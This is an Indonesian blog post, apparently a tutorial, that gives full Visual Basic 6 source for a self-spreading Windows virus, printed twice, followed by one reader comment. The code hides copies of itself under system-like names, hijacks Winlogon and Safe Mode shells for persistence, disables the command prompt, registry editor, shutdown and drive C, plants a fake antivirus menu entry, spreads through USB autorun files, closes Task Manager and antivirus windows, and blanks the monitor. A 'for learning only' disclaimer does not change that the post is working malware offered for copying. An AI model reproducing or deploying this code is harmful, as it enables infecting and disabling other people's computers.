Virus adalah sebuah program yang berfungsi atau dibuat untuk merusak
komputer. tetapi disini saya hanya mengajari bagaimana cara membuat
program perusak tersebut. tapi ini jangan dijadikan senjata untuk
merusak komputer orang lain, hanya untuk mempelajari bagaimana cara
kerja virus dan cara dia menyearkan diri sehingga kita bisa untuk
mengantisipasinya.
1. Buat sebuah project dengan standart EXE
2. masukan sebuah Timer dan sebuah Label kedalam project tersebut.
3. Ketikan listing program dibawah ini. untuk memudahkan anda, anda bisa mengcopynya langsung kedalam project yang andah buat tadi.
Listing Programnuya sebagai berikut:
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Any) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long 'pencari Kleas dan Window Name Suatu File
Private Declare Function GetDriveType& Lib "Kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) ' penghandel flashdisk
Const SC_MONITORPOWER = &HF170&
Const MONITOR_ON = -1&
Const MONITOR_OFF = 2&
Const WM_SYSCOMMAND = &H112
Private Const WM_CLOSE = &H10
Option Explicit
Dim FWnd
Dim i As Integer
Dim RegRun
Dim FolderMyDocuments
Dim FolderFavorites
Dim FolderWindows
Dim FlashDisk
Dim Ttd, Td, Thd, D As Integer
Private Sub aktif()
On Error Resume Next
Randomize
Me.Caption = Int(Rnd * 2221189331445#)
GandakefolderIstimewa
InfeksiRegistry
MsgBox "Hy adek sanak, aQ datang untuk kalian segalonyo, terimo kasih y lah ndx bekawan" & vbCrLf & "Dalam 30 Detik Monitor kw mati", "Salam Kenal"
End Sub
Sub InfeksiRegistry()
‘Membuat pertahanan dan penginfeksian virus
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & " """ & FolderMyDocuments & "\Winlog0n.exe""" 'virus akan tetap berjalan pada tipe windows Safe Mode
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & " """ & FolderWindows & "\Winlgo0n1.exe""" 'virus akan tetap berjalan pada tipe windows Safe Mode
RegRun.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell", FolderFavorites & "\Winlgo0nn.exe" 'virus akan tetap berjalan pada tipe windows Safe Mode With Command Prompt
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD", 1, "REG_DWORD" 'Disable CMD dan File .Bat
RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD", 1, "REG_DWORD" 'Disable CMD dan File .Bat
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools", 1, "REG_DWORD" 'registry tdk dapat diakses dan tdk dapat melakukan pengimporan file berekstensi Reg
RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools", 1, "REG_DWORD" 'registry tdk dapat diakses dan tdk dapat melakukan pengimporan file berekstensi Reg
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose", 1, "REG_DWORD" 'Tombol Turn Off pd star menu hilang
RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose", 1, "REG_DWORD" 'Tombol Turn Off pd star menu hilang
RegRun.regwrite "HKEY_CLASSES_ROOT\Drive\shell\Scan With Antivirus\Command\", FolderFavorites & "\cssz.exe" 'Membuat Menu Scan With Antivirus pada klik kanan Drive-drive, tapi bukan Antivirus yang dijalankan melainkan Virus cssz.exe yang terletak di Folder Favorite
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives", 4, "REG_DWORD" 'Drive C hilang
RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives", 4, "REG_DWORD" 'Drive C hilang
RegRun.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Autorun", 1, "REG_DWORD" 'Autorun pada CD atau USB
RegRun.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\advanced\Start_ShowControlPanel", 0, "REG_DWORD"
End Sub
Sub GandaKeFlashDisk()
‘menyebarkan virus ke flasdisk pada saat flasdisk tercolok ke komputer
On Error Resume Next
If Dir(FlashDisk & "\Winlog0n.exe") <> "Winlog0n.exe" Then 'mengecek ada atau tdknya Winlog0n.exe di flashdisk jika tdk ada kemudian
FileCopy FolderMyDocuments & "\Winlog0n.exe", FlashDisk & "\Winlog0n.exe"
SetAttr FlashDisk & "\Winlog0n.exe", vbHidden + vbSystem + vbReadOnly
End If
BuatFileAutorunInf
End Sub
Sub BuatFileAutorunInf()
Open FlashDisk & "\Autorun.Inf" For Output As 1
Print #1, "[AutoRun]"
Print #1, "ACtIon=Open folder to view files"
Print #1, "Icon=Winlog0n.exe"
Print #1, "Open=Winlog0n.exe"
Print #1, "Open=Winlgo0nn.exe"
Print #1, "ShellExecute=Winlog0n.exe"
Print #1, "ShellExecute=Winlgo0nn.exe"
Print #1, "Shell\Open\Command=Winlog0n.exe"
Print #1, "sheLl\oPen\DefAulT=1"
Print #1, "shELl\opeN\cOmManD= Winlog0n.exe"
Print #1, "Shell=Open"
Print #1, "shell\ExplorE\COMmANd=Winlgo0nn.exe"
Print #1, "uSEAuToPLaY = 1"
Print #1, "SHell\autopLAy\commAND=Winlog0n.exe"
Print #1, "SHell\autopLAy\commAND=Winlgo0nn.exe"
Close #1
SetAttr FlashDisk & "\Autorun.Inf", vbHidden + vbSystem + vbReadOnly
End Sub
Sub GandakefolderIstimewa()
Set RegRun = CreateObject("WScript.Shell")
FolderMyDocuments = RegRun.specialfolders("MyDocuments")
FolderFavorites = RegRun.specialfolders("Favorites")
FolderWindows = RegRun.specialfolder("Windows")
'membuat virus dengan nama hay.exe
On Error Resume Next
'membuat virus dengan nama Winlog0n.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderMyDocuments & "\Winlog0n.exe"
SetAttr FolderMyDocuments & "\Winlog0n.exe", vbHidden + vbSystem + vbReadOnly
'membuat file Winlgo0nn.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderFavorites & "\Winlgo0nn.Exe"
SetAttr FolderFavorites & "\Winlgo0nn.exe", vbHidden + vbSystem + vbReadOnly
'membuat virus dengan nama Winlgo0n1.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderWindows & "\Winlgo0n1.Exe"
SetAttr FolderWindows & "\Winlgo0n1.exe", vbHidden + vbSystem + vbReadOnly
End Sub
Private Sub Tutup()
‘menutup aplikasi yang membahayakan virus
On Error Resume Next
FWnd = FindWindow("#32770", "RUN") 'jendela run
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "System Configuration Utility") 'msconfig
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "Windows Task Manager") 'task manager
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "Avira AntiVir Personal - Free Antivirus") 'Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "AntiVir Guard: Attention, Detection!") 'Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("RegEdit_RegEdit", vbNullString) 'regedit.exe
SendMessage FWnd, WM_CLOSE, 0&, 0&
InfeksiRegistry
End Sub
Private Sub mati()
‘mematikan monitor pengguna
SendMessage Me.hWnd, WM_SYSCOMMAND, SC_MONITORPOWER, MONITOR_OFF
End Sub
Private Sub Form_Load()
GandakefolderIstimewa
InfeksiRegistry
GandaKeFlashDisk
Tutup
aktif
End Sub
Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
Cancel = 1
End Sub
Private Sub Timer1_Timer()
Tutup
Ttd = Ttd + 1
Thd = Ttd Mod 60
Td = Int(Ttd / 60)
D = Td Mod 60
Label1.Caption = D
If D = 30 Then
Me.Visible = False
mati
End If
End Sub
Virus siap dijalankan. eit……hati-hati karena virus ini cukup berbahaya, karena monitor tidak berfungsi untuk menampilkan data(Alias monitor dalam keadaan layar hitam)
Ini hanya sekedar pelajaran, jangan disalahgunakan.
semoga bermanfaat………
1. Buat sebuah project dengan standart EXE
2. masukan sebuah Timer dan sebuah Label kedalam project tersebut.
3. Ketikan listing program dibawah ini. untuk memudahkan anda, anda bisa mengcopynya langsung kedalam project yang andah buat tadi.
Listing Programnuya sebagai berikut:
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Any) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long 'pencari Kleas dan Window Name Suatu File
Private Declare Function GetDriveType& Lib "Kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) ' penghandel flashdisk
Const SC_MONITORPOWER = &HF170&
Const MONITOR_ON = -1&
Const MONITOR_OFF = 2&
Const WM_SYSCOMMAND = &H112
Private Const WM_CLOSE = &H10
Option Explicit
Dim FWnd
Dim i As Integer
Dim RegRun
Dim FolderMyDocuments
Dim FolderFavorites
Dim FolderWindows
Dim FlashDisk
Dim Ttd, Td, Thd, D As Integer
Private Sub aktif()
On Error Resume Next
Randomize
Me.Caption = Int(Rnd * 2221189331445#)
GandakefolderIstimewa
InfeksiRegistry
MsgBox "Hy adek sanak, aQ datang untuk kalian segalonyo, terimo kasih y lah ndx bekawan" & vbCrLf & "Dalam 30 Detik Monitor kw mati", "Salam Kenal"
End Sub
Sub InfeksiRegistry()
‘Membuat pertahanan dan penginfeksian virus
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & " """ & FolderMyDocuments & "\Winlog0n.exe""" 'virus akan tetap berjalan pada tipe windows Safe Mode
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & " """ & FolderWindows & "\Winlgo0n1.exe""" 'virus akan tetap berjalan pada tipe windows Safe Mode
RegRun.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell", FolderFavorites & "\Winlgo0nn.exe" 'virus akan tetap berjalan pada tipe windows Safe Mode With Command Prompt
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD", 1, "REG_DWORD" 'Disable CMD dan File .Bat
RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD", 1, "REG_DWORD" 'Disable CMD dan File .Bat
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools", 1, "REG_DWORD" 'registry tdk dapat diakses dan tdk dapat melakukan pengimporan file berekstensi Reg
RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools", 1, "REG_DWORD" 'registry tdk dapat diakses dan tdk dapat melakukan pengimporan file berekstensi Reg
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose", 1, "REG_DWORD" 'Tombol Turn Off pd star menu hilang
RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose", 1, "REG_DWORD" 'Tombol Turn Off pd star menu hilang
RegRun.regwrite "HKEY_CLASSES_ROOT\Drive\shell\Scan With Antivirus\Command\", FolderFavorites & "\cssz.exe" 'Membuat Menu Scan With Antivirus pada klik kanan Drive-drive, tapi bukan Antivirus yang dijalankan melainkan Virus cssz.exe yang terletak di Folder Favorite
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives", 4, "REG_DWORD" 'Drive C hilang
RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives", 4, "REG_DWORD" 'Drive C hilang
RegRun.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Autorun", 1, "REG_DWORD" 'Autorun pada CD atau USB
RegRun.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\advanced\Start_ShowControlPanel", 0, "REG_DWORD"
End Sub
Sub GandaKeFlashDisk()
‘menyebarkan virus ke flasdisk pada saat flasdisk tercolok ke komputer
On Error Resume Next
If Dir(FlashDisk & "\Winlog0n.exe") <> "Winlog0n.exe" Then 'mengecek ada atau tdknya Winlog0n.exe di flashdisk jika tdk ada kemudian
FileCopy FolderMyDocuments & "\Winlog0n.exe", FlashDisk & "\Winlog0n.exe"
SetAttr FlashDisk & "\Winlog0n.exe", vbHidden + vbSystem + vbReadOnly
End If
BuatFileAutorunInf
End Sub
Sub BuatFileAutorunInf()
Open FlashDisk & "\Autorun.Inf" For Output As 1
Print #1, "[AutoRun]"
Print #1, "ACtIon=Open folder to view files"
Print #1, "Icon=Winlog0n.exe"
Print #1, "Open=Winlog0n.exe"
Print #1, "Open=Winlgo0nn.exe"
Print #1, "ShellExecute=Winlog0n.exe"
Print #1, "ShellExecute=Winlgo0nn.exe"
Print #1, "Shell\Open\Command=Winlog0n.exe"
Print #1, "sheLl\oPen\DefAulT=1"
Print #1, "shELl\opeN\cOmManD= Winlog0n.exe"
Print #1, "Shell=Open"
Print #1, "shell\ExplorE\COMmANd=Winlgo0nn.exe"
Print #1, "uSEAuToPLaY = 1"
Print #1, "SHell\autopLAy\commAND=Winlog0n.exe"
Print #1, "SHell\autopLAy\commAND=Winlgo0nn.exe"
Close #1
SetAttr FlashDisk & "\Autorun.Inf", vbHidden + vbSystem + vbReadOnly
End Sub
Sub GandakefolderIstimewa()
Set RegRun = CreateObject("WScript.Shell")
FolderMyDocuments = RegRun.specialfolders("MyDocuments")
FolderFavorites = RegRun.specialfolders("Favorites")
FolderWindows = RegRun.specialfolder("Windows")
'membuat virus dengan nama hay.exe
On Error Resume Next
'membuat virus dengan nama Winlog0n.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderMyDocuments & "\Winlog0n.exe"
SetAttr FolderMyDocuments & "\Winlog0n.exe", vbHidden + vbSystem + vbReadOnly
'membuat file Winlgo0nn.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderFavorites & "\Winlgo0nn.Exe"
SetAttr FolderFavorites & "\Winlgo0nn.exe", vbHidden + vbSystem + vbReadOnly
'membuat virus dengan nama Winlgo0n1.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderWindows & "\Winlgo0n1.Exe"
SetAttr FolderWindows & "\Winlgo0n1.exe", vbHidden + vbSystem + vbReadOnly
End Sub
Private Sub Tutup()
‘menutup aplikasi yang membahayakan virus
On Error Resume Next
FWnd = FindWindow("#32770", "RUN") 'jendela run
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "System Configuration Utility") 'msconfig
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "Windows Task Manager") 'task manager
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "Avira AntiVir Personal - Free Antivirus") 'Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "AntiVir Guard: Attention, Detection!") 'Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("RegEdit_RegEdit", vbNullString) 'regedit.exe
SendMessage FWnd, WM_CLOSE, 0&, 0&
InfeksiRegistry
End Sub
Private Sub mati()
‘mematikan monitor pengguna
SendMessage Me.hWnd, WM_SYSCOMMAND, SC_MONITORPOWER, MONITOR_OFF
End Sub
Private Sub Form_Load()
GandakefolderIstimewa
InfeksiRegistry
GandaKeFlashDisk
Tutup
aktif
End Sub
Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
Cancel = 1
End Sub
Private Sub Timer1_Timer()
Tutup
Ttd = Ttd + 1
Thd = Ttd Mod 60
Td = Int(Ttd / 60)
D = Td Mod 60
Label1.Caption = D
If D = 30 Then
Me.Visible = False
mati
End If
End Sub
Virus siap dijalankan. eit……hati-hati karena virus ini cukup berbahaya, karena monitor tidak berfungsi untuk menampilkan data(Alias monitor dalam keadaan layar hitam)
Ini hanya sekedar pelajaran, jangan disalahgunakan.
semoga bermanfaat………
1 komentar:
Ada kode yang error Bozz coba di periksa kembali, saya pakai VB 0.6
Posting Komentar